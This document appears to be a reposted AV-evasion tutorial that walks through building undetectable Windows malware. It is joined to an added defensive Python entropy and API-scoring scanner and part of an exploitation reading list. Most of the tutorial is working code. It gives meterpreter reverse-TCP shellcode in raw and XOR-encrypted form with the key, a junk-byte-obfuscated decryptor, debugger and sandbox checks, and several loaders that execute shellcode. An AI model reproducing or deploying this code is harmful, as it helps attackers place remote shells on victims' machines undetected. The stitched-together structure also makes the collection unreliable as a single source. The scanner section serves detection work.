Sandbox: In computer security, a sandbox is a security mechanism for separating running programs. It is often used to execute untested or untrusted programs or code, possibly from unverified or untrusted third parties, suppliers, users or websites, without risking harm to the host machine or operating system.[4]

Heuristic Analysis: Heuristic analysis is a method employed by many computer antivirus programs designed to detect previously unknown computer viruses, as well as new variants of viruses already in the "wild". Heuristic analysis is an expert based analysis that determines the susceptibility of a system towards a particular threat/risk using various decision rules or weighing methods. Multi-criteria analysis (MCA) is one of the means of weighing. This method differs from statistical analysis, which bases itself on the available data/statistics.[5]

Entropy: In computing, entropy is the randomness collected by an operating system or application for use in cryptography or other uses that require random data. This randomness is often collected from hardware sources, either pre-existing ones such as mouse movements or specially provided randomness generators. A lack of entropy can have a negative impact on performance and security.[6]

Common Techniques

When it comes to reducing a malware's detection score, the first things that come to mind are crypters, packers and code obfuscation. These tools and techniques are still able to bypass a good amount of AV products, but because of the advancements in the cyber security field most of the tools and methods in the wild are outdated and can't produce FUD malware. For understanding the inner workings of these techniques and tools I will give brief descriptions:

Obfuscation: Code obfuscation can be defined as mixing the source code of the binary without disrupting the real function; it makes static analysis harder and also changes the hash signatures of the binary. Obfuscation can simply be implemented by adding a few lines of garbage code or programmatically changing the execution order of the instructions. This method can bypass a good amount of AV products, but it depends on how much you obfuscate.

Packers: An executable packer is any means of compressing an executable file and combining the compressed data with decompression code into a single executable. When this compressed executable is executed, the decompression code recreates the original code from the compressed code before executing it. In most cases this happens transparently, so the compressed executable can be used in exactly the same way as the original. When an AV scanner scans a packed malware it needs to determine the compression algorithm and decompress it. Because files packed with packers are harder to analyze, malware authors have a keen interest in packers.

Crypters: Crypters are programs that encrypt the given binary to make it hard to analyze or reverse engineer. A crypter consists of two parts, a builder and a stub. The builder simply encrypts the given binary and places it inside the stub; the stub is the most important piece of the crypter. When we execute the generated binary, first the stub runs and decrypts the original binary into memory, and then executes the binary in memory via the "RunPE" method (in most cases).
The Problem About Crypters & Packers

Before moving on to the effective methods, there are a few things that need to be acknowledged about what is wrong in well-known techniques and tools. Today's AV companies have already realized the danger; now, instead of just searching for malware signatures and harmful behavior, they also search for signs of crypters and packers. Compared to detecting malware, detecting crypters and packers is relatively easy, because they all have to do certain suspicious things like decrypting the encrypted PE file and executing it in memory.

PE Injection: In order to fully explain the in-memory execution of a PE image I have to talk about how Windows loads PE files. Generally, when compiling a PE file the compiler sets the main module address at 0x00400000; during the compile process all the full address pointers and addresses at long jump instructions are calculated according to the main module address, and at the end of the compiling process the compiler creates a relocation table section in the PE file. The relocation section contains the addresses of instructions that depend on the base address of the image, such as full address pointers and long jump instructions. During execution of the PE image, the operating system checks the availability of the PE image's preferred address space; if the preferred space is not available, the operating system loads the PE image to a random available address in memory. Before starting the process, the system loader needs to adjust the absolute addresses in memory; with the help of the relocation section the system loader fixes all address-dependent instructions and starts the suspended process. All this mechanism is called "Address Layout Randomization".[7] In order to execute a PE image in memory, crypters need to parse the PE headers and relocate the absolute addresses; simply, they have to mimic the system loader, which is very unusual and suspicious.

When we analyze crypters written in C or higher-level languages, in almost every case we can see these Windows API functions called "NtUnmapViewOfSection" and "ZwUnmapViewOfSection". These functions simply unmap a view of a section from the virtual address space of a subject process; they play a very important role in the in-memory execution method called RunPE, which almost 90% of crypters use.

    xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
    xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));

Of course AV products can't just declare every program that uses these Windows API functions malicious, but the order of using these functions matters a lot. There is a small percentage of crypters (mostly written in assembly) which do not use these functions and perform the relocation manually; they are very effective at the moment, but sooner or later usage of crypters will not be profitable, because logically no non-harmful program tries to mimic the system loader. Another downside is the huge entropy increase on input files: because of encrypting the entire PE file, entropy will rise inevitably, and when AV scanners detect unusual entropy on a PE file they will probably mark the file as suspicious.

Perfect Approach

The concept of encrypting the malicious code is clever, but the decryption function should be obfuscated properly, and when it comes to executing the decrypted code in memory we have to do it without relocating the absolute addresses. Also, there has to be a detection mechanism checking whether the malware is being analyzed dynamically in a sandbox or not; if the detection mechanism detects that the malware is being analyzed by the AV, then the decryption function shouldn't be executed. Instead of encrypting the entire PE file, encrypting shellcodes or only the .text section of the binary is much more suitable; it keeps the entropy and size low and makes no changes to image headers and sections.
This will be the malware flow chart. Our “AV Detect.” function will detect if the malware is being analyze dynamically in a sandbox or not, if the function detects any sign of AV scanner then it will call the main function again or just crash, if “AV Detect” function don’t finds any sign of AV scanner it will call the “Decrypt Shellcode” function This is meterpreter reverse tcp shellcode in raw format. unsigned char Shellcode[] = { 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x68, 0x33, 0x32, 0x00, 0x00, 0x68, 0x77, 0x73, 0x32, 0x5f, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0xb8, 0x90, 0x01, 0x00, 0x00, 0x29, 0xc4, 0x54, 0x50, 0x68, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x05, 0x68, 0x7f, 0x00, 0x00, 0x01, 0x68, 0x02, 0x00, 0x11, 0x5c, 0x89, 0xe6, 0x50, 0x50, 0x50, 0x50, 0x40, 0x50, 0x40, 0x50, 0x68, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5, 0x97, 0x6a, 0x10, 0x56, 0x57, 0x68, 0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0c, 0xff, 0x4e, 0x08, 0x75, 0xec, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x00, 0x6a, 0x04, 0x56, 0x57, 0x68, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x8b, 0x36, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x56, 0x6a, 0x00, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 
0x93, 0x53, 0x6a, 0x00, 0x56, 0x53, 0x57, 0x68, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x01, 0xc3, 0x29, 0xc6, 0x75, 0xee, 0xc3 }; For keeping the entropy and size in appropriate value i will pass this shellcode to simple xor cipher with a multi byte key, xor is not an encryption standard like RC4 or blowfish but we don’t need a strong encryption anyway, AV products is not going to try to decrypt the shellcode, making it unreadable and undetectable for static string analysis is enough, also using xor makes decryption process much more faster and avoiding the encryption libraries in code will reduce the size a lot. This is the same meterpreter code xor ciphered with key. unsigned char Shellcode[] = { 0xfb, 0xcd, 0x8d, 0x9e, 0xba, 0x42, 0xe1, 0x93, 0xe2, 0x14, 0xcf, 0xfa, 0x31, 0x12, 0xb1, 0x91, 0x55, 0x29, 0x84, 0xcc, 0xae, 0xc9, 0xf3, 0x32, 0x08, 0x92, 0x45, 0xb8, 0x8b, 0xbd, 0x2d, 0x26, 0x66, 0x59, 0x0d, 0xb2, 0x9a, 0x83, 0x4e, 0x17, 0x06, 0xe2, 0xed, 0x6c, 0xe8, 0x15, 0x0a, 0x48, 0x17, 0xae, 0x45, 0xa2, 0x31, 0x0e, 0x90, 0x62, 0xe4, 0x6d, 0x0e, 0x4f, 0xeb, 0xc9, 0xd8, 0x3a, 0x06, 0xf6, 0x84, 0xd7, 0xa2, 0xa1, 0xbb, 0x53, 0x8c, 0x11, 0x84, 0x9f, 0x6c, 0x73, 0x7e, 0xb6, 0xc6, 0xea, 0x02, 0x9f, 0x7d, 0x7a, 0x61, 0x6f, 0xf1, 0x26, 0x72, 0x66, 0x81, 0x3f, 0xa5, 0x6f, 0xe3, 0x7d, 0x84, 0xc6, 0x9e, 0x43, 0x52, 0x7c, 0x8c, 0x29, 0x44, 0x15, 0xe2, 0x5e, 0x80, 0xc9, 0x8c, 0x21, 0x84, 0x9f, 0x6a, 0xcb, 0xc5, 0x3e, 0x23, 0x7e, 0x54, 0xff, 0xe3, 0x18, 0xd0, 0xe5, 0xe7, 0x7a, 0x50, 0xc4, 0x31, 0x50, 0x6a, 0x97, 0x5a, 0x4d, 0x3c, 0xac, 0xba, 0x42, 0xe9, 0x6d, 0x74, 0x17, 0x50, 0xca, 0xd2, 0x0e, 0xf6, 0x3c, 0x00, 0xda, 0xda, 0x26, 0x2a, 0x43, 0x81, 0x1a, 0x2e, 0xe1, 0x5b, 0xce, 0xd2, 0x6b, 0x01, 0x71, 0x07, 0xda, 0xda, 0xf4, 0xbf, 0x2a, 0xfe, 0x1a, 0x07, 0x24, 0x67, 0x9c, 0xba, 0x53, 0xdd, 0x93, 0xe1, 0x75, 0x5f, 0xce, 0xea, 0x02, 0xd1, 0x5a, 0x57, 0x4d, 0xe5, 0x91, 0x65, 0xa2, 0x7e, 0xcf, 0x90, 0x4f, 0x1f, 0xc8, 0xed, 0x2a, 0x18, 0xbf, 0x73, 0x44, 0xf0, 0x4b, 0x3f, 0x82, 0xf5, 
0x16, 0xf8, 0x6b, 0x07, 0xeb, 0x56, 0x2a, 0x71, 0xaf, 0xa5, 0x73, 0xf0, 0x4b, 0xd0, 0x42, 0xeb, 0x1e, 0x51, 0x72, 0x67, 0x9c, 0x63, 0x8a, 0xde, 0xe5, 0xd2, 0xae, 0x39, 0xf4, 0xfa, 0x2a, 0x81, 0x0a, 0x07, 0x25, 0x59, 0xf4, 0xba, 0x2a, 0xd9, 0xbe, 0x54, 0xc0, 0xf0, 0x4b, 0x29, 0x11, 0xeb, 0x1a, 0x51, 0x76, 0x58, 0xf6, 0xb8, 0x9b, 0x49, 0x45, 0xf8, 0xf0, 0x0e, 0x5d, 0x93, 0x84, 0xf4, 0xf4, 0xc4 }; unsigned char Key[] = { 0x07, 0x25, 0x0f, 0x9e, 0xba, 0x42, 0x81, 0x1a }; Because of we are writing a new piece of malware, our malware’s hash signature will not be known by the anti virus products, so we don’t need to worry about signature based detection, we will encrypt our shellcode and obfuscate our anti detection/reverse engineering and decryption functions also these will be enough for bypassing static/heuristic analysis phase, there is only one more phase we need to bypass and it is the dynamic analysis phase,most important part is the success of the “AV detect” function, before starting to write the function we need to understand how heuristic engines of AV products works. Heuristic Engines Heuristic engines are basically statistical and rule based analyze mechanisms. Their main purpose is detecting new generation(previously unknown) viruses by categorizing and giving threat/risk grades to code fragments according to predefined criterias, even when a simple hello world program scanned by AV products, heuristic engine decides on a threat/risk score if the score is higher then thresholds then the file gets marked as malicious. Heuristic engines are the most advanced part of AV products they use significant amount of rules and criterias, since no anti virus company releases blueprints or documentation about their heuristic engines all known selective criterias about their threat/risk grading policy are found with trial and error. 
Some of the known rules about threat grading:
– Decryption loop detected
– Reads active computer name
– Reads the cryptographic machine GUID
– Contacts random domain names
– Reads the windows installation date
– Drops executable files
– Found potential IP address in binary memory
– Modifies proxy settings
– Installs hooks/patches the running process
– Injects into explorer
– Injects into remote process
– Queries process information
– Sets the process error mode to suppress error box
– Unusual entropy
– Possibly checks for the presence of antivirus engine
– Monitors specific registry key for changes
– Contains ability to elevate privileges
– Modifies software policy settings
– Reads the system/video BIOS version
– Endpoint in PE header is within an uncommon section
– Creates guarded memory regions
– Spawns a lot of processes
– Tries to sleep for a long time
– Unusual sections
– Reads windows product id
– Contains decryption loop
– Contains ability to start/interact device drivers
– Contains ability to block user input
…

When writing our AV detect and Decrypt Shellcode functions we have to be careful about all these rules.

Decrypt Shellcode: Obfuscating the decryption mechanism is vital; most AV heuristic engines are able to detect decryption loops inside PE files. After the huge increase in ransomware cases, some heuristic engines are even built mainly just for finding encryption/decryption routines. After they detect a decryption routine, some scanners wait until the ECX register is "0", which most of the time indicates the end of the loop; after they reach the end of the decryption loop they will re-analyze the decrypted content of the file.

This will be the "Decrypt Shellcode" function:

    void DecryptShellcode() {
        for (int i = 0; i < sizeof(Shellcode); i++) {
            __asm {
                PUSH EAX
                XOR EAX, EAX
                JZ True1
                __asm __emit(0xca)
                __asm __emit(0x55)
                __asm __emit(0x78)
                __asm __emit(0x2c)
                __asm __emit(0x02)
                __asm __emit(0x9b)
                __asm __emit(0x6e)
                __asm __emit(0xe9)
                __asm __emit(0x3d)
                __asm __emit(0x6f)
            True1:
                POP EAX
            }
            Shellcode[i] = (Shellcode[i] ^ Key[(i % sizeof(Key))]);
            __asm {
                PUSH EAX
                XOR EAX, EAX
                JZ True2
                __asm __emit(0xd5)
                __asm __emit(0xb6)
                __asm __emit(0x43)
                __asm __emit(0x87)
                __asm __emit(0xde)
                __asm __emit(0x37)
                __asm __emit(0x24)
                __asm __emit(0xb0)
                __asm __emit(0x3d)
                __asm __emit(0xee)
            True2:
                POP EAX
            }
        }
    }

It is a for loop that makes a logical xor operation between a shellcode byte and a key byte; the assembly blocks below and above literally do nothing, they cover the logical xor operation with random bytes and jump over them. Because we are not using any advanced decryption mechanism, this will be enough for obfuscating the "Decrypt Shellcode" function.

Dynamic Analysis Detection: Also, while writing the sandbox detection mechanism we need to obfuscate our methods; if the heuristic engine detects any sign of anti reverse engineering methods it would be very bad for the malware's threat score.

Is Debugger Present: Our first AV detection mechanism will be checking for a debugger in our process. There is a Windows API function for this operation; it "Determines whether the calling process is being debugged by a user-mode debugger." But we will not use it, because most AV products are monitoring the Win API calling statements; they would probably detect and treat this function as an anti reverse engineering method. Instead of using the Win API function we will go and look at the "BeingDebugged" byte in the PEB block.
    // bool WINAPI IsDebuggerPresent(void);
    __asm {
    CheckDebugger:
        PUSH EAX                          // Save the EAX value to stack
        MOV EAX, DWORD PTR FS : [0x18]    // Get PEB structure address
        MOV EAX, DWORD PTR[EAX + 0x30]    // Get being debugged byte
        CMP BYTE PTR[EAX + 2], 0          // Check if being debugged byte is set
        JNE CheckDebugger                 // If debugger present check again
        POP EAX                           // Put back the EAX value
    }

With some inline assembly this piece of code points a pointer to the BeingDebugged byte in the PEB block; if a debugger is present it will check again until an overflow occurs in the stack. When an overflow occurs the stack canaries will trigger an exception and the process will be closed; this is the shortest way to exit the program. Manually checking the BeingDebugged byte will bypass a good amount of AV products, but still some AV products have taken measures about this issue, so we need to obfuscate the code to avoid static string analysis.

    __asm {
    CheckDebugger:
        PUSH EAX
        MOV EAX, DWORD PTR FS : [0x18]
        __asm {
            PUSH EAX
            XOR EAX, EAX
            JZ J
            __asm __emit(0xea)
        J:
            POP EAX
        }
        MOV EAX, DWORD PTR[EAX + 0x30]
        __asm {
            PUSH EAX
            XOR EAX, EAX
            JZ J2
            __asm __emit(0xea)
        J2:
            POP EAX
        }
        CMP BYTE PTR[EAX + 2], 0
        __asm {
            PUSH EAX
            XOR EAX, EAX
            JZ J3
            __asm __emit(0xea)
        J3:
            POP EAX
        }
        JNE CheckDebugger
        POP EAX
    }

I have added a jump instruction after every operation; this will not affect our purpose, but adding garbage bytes between jumps will obfuscate the code and avoid static string filters.

Load Fake Library: In this method we will try to load a non-existing dll at runtime. Normally when we try to load a non-existing dll, HINSTANCE returns NULL, but some dynamic analysis mechanisms in AV products allow such cases in order to further investigate the execution flow of the program.

    bool BypassAV(char const * argv[]) {
        HINSTANCE DLL = LoadLibrary(TEXT("fake.dll"));
        if (DLL != NULL) {
            BypassAV(argv);
        }
    }

Get Tick Count: In this method we will be exploiting the time deadline of AV products. In most cases AV scanners are designed for the end user; they need to be user friendly and suitable for daily usage. This means they can't spend too much time scanning files; they need to scan files as quickly as possible. At first malware developers used the "sleep()" function for waiting until the scan completes, but nowadays this trick almost never works: every AV product skips the sleep function when it encounters one. We will use this against them. The code below uses a Win API function called "GetTickCount()"; this function "Retrieves the number of milliseconds that have elapsed since the system was started, up to 49.7 days." We will use it to get the time passed since the OS booted, then try to sleep 1 second; after the sleep function we will check whether the sleep function was skipped or not by comparing the two GetTickCount() values.

    int Tick = GetTickCount();
    Sleep(1000);
    int Tac = GetTickCount();
    if ((Tac - Tick) < 1000) {
        return false;
    }

Number Of Cores: This method will simply check the number of processor cores on the system. Since AV products can't afford allocating too many resources from the host computer, we can check the core number in order to determine whether we are in a sandbox or not. Some AV products don't even support multi-core processing, so they shouldn't be able to reserve more than 1 processor core for their sandbox environment.

    SYSTEM_INFO SysGuide;
    GetSystemInfo(&SysGuide);
    int CoreNum = SysGuide.dwNumberOfProcessors;
    if (CoreNum < 2) {
        return false;
    }

Huge Memory Allocations: This method also exploits the time deadline on each AV scan; we simply allocate nearly 100 Mb of memory, then fill it with NULL bytes, and at the end free it.

    char * Memdmp = NULL;
    Memdmp = (char *)malloc(100000000);
    if (Memdmp != NULL) {
        memset(Memdmp, 00, 100000000);
        free(Memdmp);
    }

When the program's memory starts to grow at runtime, eventually AV scanners will end the scan for the sake of not spending too much time on a file; this method can be used multiple times. This is a very primitive and old technique, but it still bypasses a good amount of scanners.

Trap Flag Manipulation: The trap flag is used for tracing the program. If this flag is set, every instruction will raise a "SINGLE_STEP" exception. The trap flag can be manipulated in order to thwart tracers. We can manipulate the trap flag with the code below:

    __asm {
        PUSHF                     // Push all flags to stack
        MOV DWORD [ESP], 0x100    // Set 0x100 to the last flag on the stack
        POPF                      // Put back all flags register values
    }

Mutex Triggered WinExec: This method is very promising because of its simplicity; we create a condition for checking whether a certain mutex object already exists on the system or not.

    HANDLE AmberMutex = CreateMutex(NULL, TRUE, "FakeMutex");
    if(GetLastError() != ERROR_ALREADY_EXISTS){
        WinExec(argv[0],0);
    }

If the "CreateMutex" function does not return an already-exists error, we execute the malware binary again. Since most AV products don't let programs that are being dynamically analyzed start new processes or access files outside the AV sandbox, when the already-exists error occurs execution of the decrypt function may start. There are many more creative ways of mutex usage in anti-detection.

Proper Ways To Execute Shellcodes

Starting with Windows Vista, Microsoft introduced Data Execution Prevention or DEP[8], a security feature that can help prevent damage to your computer by monitoring programs from time to time. Monitoring ensures that a running program uses system memory efficiently. If there is any instance of a program on your computer using memory incorrectly, DEP notices it, closes the program and notifies you. That means you can't just put some bytes into a char array and execute it; you need to allocate a memory region with read, write and execute flags using Windows API functions.
Microsoft has several memory manipulation API functions for reserving memory pages; most of the common malware in the field uses the "VirtualAlloc" function for reserving memory pages. As you can guess, common usage of functions helps AV products with defining detection rules; using other memory manipulation functions will also do the trick, and they may attract less attention. I will list several shellcode execution methods with different memory manipulation API functions.

HeapCreate/HeapAlloc: Windows also allows creating RWE heap regions.

    void ExecuteShellcode(){
        HANDLE HeapHandle = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, sizeof(Shellcode), sizeof(Shellcode));
        char * BUFFER = (char*)HeapAlloc(HeapHandle, HEAP_ZERO_MEMORY, sizeof(Shellcode));
        memcpy(BUFFER, Shellcode, sizeof(Shellcode));
        (*(void(*)())BUFFER)();
    }

LoadLibrary/GetProcAddress: The LoadLibrary and GetProcAddress Win API function combination allows us to use all other Win API functions; with this usage there will be no direct call to the memory manipulation function, and the malware will probably be less attractive.

    void ExecuteShellcode(){
        HINSTANCE K32 = LoadLibrary(TEXT("kernel32.dll"));
        if(K32 != NULL){
            MYPROC Allocate = (MYPROC)GetProcAddress(K32, "VirtualAlloc");
            char* BUFFER = (char*)Allocate(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            memcpy(BUFFER, Shellcode, sizeof(Shellcode));
            (*(void(*)())BUFFER)();
        }
    }

GetModuleHandle/GetProcAddress: This method does not even use the LoadLibrary function; it takes advantage of the already loaded kernel32.dll. The GetModuleHandle function retrieves the module handle from an already loaded dll; this method is possibly one of the most silent ways to execute shellcode.

    void ExecuteShellcode(){
        MYPROC Allocate = (MYPROC)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
        char* BUFFER = (char*)Allocate(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        memcpy(BUFFER, Shellcode, sizeof(Shellcode));
        (*(void(*)())BUFFER)();
    }

Multi Threading

It is always harder to reverse engineer multi-threaded PE files; it is also challenging for AV products. The multi-threading approach can be used with all the execution methods above, so instead of just pointing a function pointer to the shellcode and executing it, creating a new thread will complicate things for AV scanners, plus it allows us to keep executing the "AV Detect" function while executing the shellcode at the same time.

    void ExecuteShellcode(){
        char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        memcpy(BUFFER, Shellcode, sizeof(Shellcode));
        CreateThread(NULL,0,LPTHREAD_START_ROUTINE(BUFFER),NULL,0,NULL);
        while(TRUE){
            BypassAV(argv);
        }
    }

The above code executes the shellcode by creating a new thread; just after creating the thread there is an infinite while loop that is executing the bypass AV function. This approach will almost double the effect of our bypass AV function: the bypass AV function will keep checking for sandbox and dynamic analysis signs while the shellcode runs. This is also vital for bypassing some advanced heuristic engines that wait until the execution of the shellcode.

Conclusion

Towards the end there are a few more things that need to be covered about compiling the malware. When compiling the source, safeguards like stack savers need to be on, and stripping the symbols is vital for hardening the reverse engineering process of our malware and reducing the size; compiling on Visual Studio is recommended because of the inline assembly syntax used in this paper. When all of these methods are combined, the generated malware is able to bypass the 35 most advanced AV products.

PoC

The Meterpreter created by using the techniques we have described in this article shows how our malware produces results in real systems. Sooner or later these methods are also going to expire, but there will always be more ways to bypass AV products.

Source: https://pentest.blog/art-of-anti-detection-1-introduction-to-av-detection-techniques/
Part 2: https://pentest.blog/art-of-anti-detection-2-pe-backdoor-manufacturing/
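The post above describes the two static signals a heuristic engine scores, unusual entropy and suspicious API combinations, and argues that a repeating-key XOR over a small payload keeps entropy low while a crypter that encrypts the whole file does not. The following Python is an added example written from the scanner's side; it is not code from the original post, from pentest.blog, or from any AV vendor. The rule set is drawn from the post's own rule list, but the weights, the threshold and the "suspicious" cut-off are illustrative values I chose, and every byte string it scans is constructed inline rather than taken from a real binary.

```python
"""Toy static heuristics of the kind the post's rule list describes:
Shannon entropy plus co-occurring API names. Added example, not the
post's code or any vendor's engine. All inputs are constructed below."""
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, close to 8.0 for
    uniformly random bytes. Real scanners compute this per PE section,
    which is why a crypter that encrypts the whole file stands out."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def xor_repeating_key(data: bytes, key: bytes) -> bytes:
    """The reversible repeating-key XOR the post applies to its payload."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# API name combinations drawn from the post's rule list, each with an
# illustrative weight and the reason an analyst would log. Names are
# matched as raw ASCII, the way an import-table or string scan sees them.
API_RULES = [
    ({b"NtUnmapViewOfSection", b"CreateProcess"}, 4, "loader mimicry / in-memory PE injection"),
    ({b"VirtualAlloc", b"CreateThread"}, 3, "RWX allocation followed by thread start"),
    ({b"HeapCreate", b"HeapAlloc"}, 2, "executable heap pattern"),
    ({b"GetTickCount", b"Sleep"}, 2, "timing check for sandbox sleep skipping"),
    ({b"CreateMutex", b"WinExec"}, 3, "mutex-gated self re-execution"),
    ({b"IsDebuggerPresent"}, 2, "debugger presence check"),
]


def score_sample(data: bytes, entropy_threshold: float = 7.5):
    """Return (score, reasons). A score of 5 or more counts as suspicious
    in this toy; threshold and weights are assumptions, not vendor values."""
    score, reasons = 0, []
    ent = shannon_entropy(data)
    if ent >= entropy_threshold:
        score += 3
        reasons.append(f"unusual entropy {ent:.2f} bits/byte")
    for names, weight, why in API_RULES:
        if all(name in data for name in names):
            score += weight
            reasons.append(why)
    return score, reasons


def build_samples() -> dict:
    """Constructed inputs, not real binaries:
    - 'encrypted': what a whole-file crypter output looks like to entropy,
    - 'xor_hidden': a small text payload under a repeating 4-byte XOR key
      beside plain API names, the low-entropy arrangement the post favours."""
    rng = random.Random(1)  # seeded so the sample is reproducible
    encrypted = bytes(rng.getrandbits(8) for _ in range(4096))
    payload = b"The quick brown fox jumps over the lazy dog. " * 50
    key = b"\x13\x37\x2a\x5c"  # constructed key, not the post's key
    imports = b"\x00VirtualAlloc\x00CreateThread\x00GetTickCount\x00Sleep\x00"
    return {"encrypted": encrypted,
            "xor_hidden": xor_repeating_key(payload, key) + imports}


if __name__ == "__main__":
    for name, blob in build_samples().items():
        print(name, round(shannon_entropy(blob), 2), score_sample(blob))
```

The two samples make the post's point from the defender's chair: the whole-file ciphertext trips only the entropy rule, while the XOR-hidden sample stays under the entropy threshold and is caught solely by the API co-occurrence rules, so a scanner that relies on entropy alone misses exactly the layout the post recommends. Scoring per PE section and resolving imports properly (rather than substring matching) is what a production engine would add on top of this.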
  15. Awesome Windows Exploitation

A curated list of awesome Windows Exploitation resources, and shiny things. There is no pre-established order of items in each category; the order is that of contribution. If you want to contribute, please read the guide.

Table of Contents
- Windows stack overflows
- Windows heap overflows
- Kernel based Windows overflows
- Return Oriented Programming
- Windows memory protections
- Bypassing filter and protections
- Typical windows exploits
- Exploit development tutorial series (Corelan Team, Fuzzysecurity, Securitysift, Whitehatters Academy, TheSprawl)
- Tools

Windows stack overflows
Stack Based Overflow Articles.
- Win32 Buffer Overflows (Location, Exploitation and Prevention) - by Dark spyrit [1999]
- Writing Stack Based Overflows on Windows - by Nish Bhalla [2005]
- Stack Smashing as of Today - by Hagen Fritsch [2009]
- SMASHING C++ VPTRS - by rix [2000]

Windows heap overflows
Heap Based Overflow Articles.
- Third Generation Exploitation smashing heap on 2k - by Halvar Flake [2002]
- Exploiting the MSRPC Heap Overflow Part 1 - by Dave Aitel (MS03-026) [September 2003]
- Exploiting the MSRPC Heap Overflow Part 2 - by Dave Aitel (MS03-026) [September 2003]
- Windows heap overflow penetration in black hat - by David Litchfield [2004]
- Glibc Adventures: The Forgotten Chunk - by François Goichon [2015]
- Pseudomonarchia jemallocum - by argp & huku
- The House Of Lore: Reloaded - by blackngel [2010]
- Malloc Des-Maleficarum - by blackngel [2009]
- free() exploitation technique - by huku
- Understanding the heap by breaking it - by Justin N. Ferguson [2007]
- The use of set_head to defeat the wilderness - by g463
- The Malloc Maleficarum - by Phantasmal Phantasmagoria [2005]
- Exploiting The Wilderness - by Phantasmal Phantasmagoria [2004]
- Advanced Doug Lea's malloc exploits - by jp

Kernel based Windows overflows
Kernel Based Exploit Development Articles.
- How to attack kernel based vulns on windows was done - by a Polish group called "sec-labs" [2003]
- Sec-lab old whitepaper
- Sec-lab old exploit
- Windows Local Kernel Exploitation (based on sec-lab research) - by S.K Chong [2004]
- How to exploit Windows kernel memory pool - by SoBeIt [2005]
- Exploiting remote kernel overflows in windows - by Eeye Security
- Kernel-mode Payloads on Windows in uninformed - by Matt Miller
- Exploiting 802.11 Wireless Driver Vulnerabilities on Windows
- BH US 2007 Attacking the Windows Kernel
- Remote and Local Exploitation of Network Drivers
- Exploiting Common Flaws In Drivers
- I2OMGMT Driver Impersonation Attack
- Real World Kernel Pool Exploitation
- Exploit for windows 2k3 and 2k8
- Analyzing local privilege escalations in win32k
- Intro to Windows Kernel Security Development
- There's a party at ring0 and you're invited
- Windows kernel vulnerability exploitation
- A New CVE-2015-0057 Exploit Technology - by Yu Wang [2016]
- Exploiting CVE-2014-4113 on Windows 8.1 - by Moritz Jodeit [2016]
- Easy local Windows Kernel exploitation - by Cesar Cerrudo [2012]
- Windows Kernel Exploitation - by Simone Cardona [2016]

Return Oriented Programming
- The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls
- Blind return-oriented programming
- Sigreturn-oriented Programming
- Jump-Oriented Programming: A New Class of Code-Reuse Attack
- Out of control: Overcoming control-flow integrity
- ROP is Still Dangerous: Breaking Modern Defenses
- Loop-Oriented Programming (LOP): A New Code Reuse Attack to Bypass Modern Defenses - by Bingchen Lan, Yan Li, Hao Sun, Chao Su, Yao Liu, Qingkai Zeng [2015]
- Systematic Analysis of Defenses Against Return-Oriented Programming - by R. Skowyra, K. Casteel, H. Okhravi, N. Zeldovich, and W. Streilein [2013]
- Return-oriented programming without returns - by S. Checkoway, L. Davi, A. Dmitrienko, A. Sadeghi, H. Shacham, and M. Winandy [2010]
- Jump-oriented programming: a new class of code-reuse attack - by T. K. Bletsch, X. Jiang, V. W. Freeh, and Z. Liang [2011]
- Stitching the gadgets: on the ineffectiveness of coarse-grained control-flow integrity protection - by L. Davi, A. Sadeghi, and D. Lehmann [2014]
- Size does matter: Why using gadget-chain length to prevent code-reuse attacks is hard - by E. Göktas, E. Athanasopoulos, M. Polychronakis, H. Bos, and G. Portokalidis [2014]
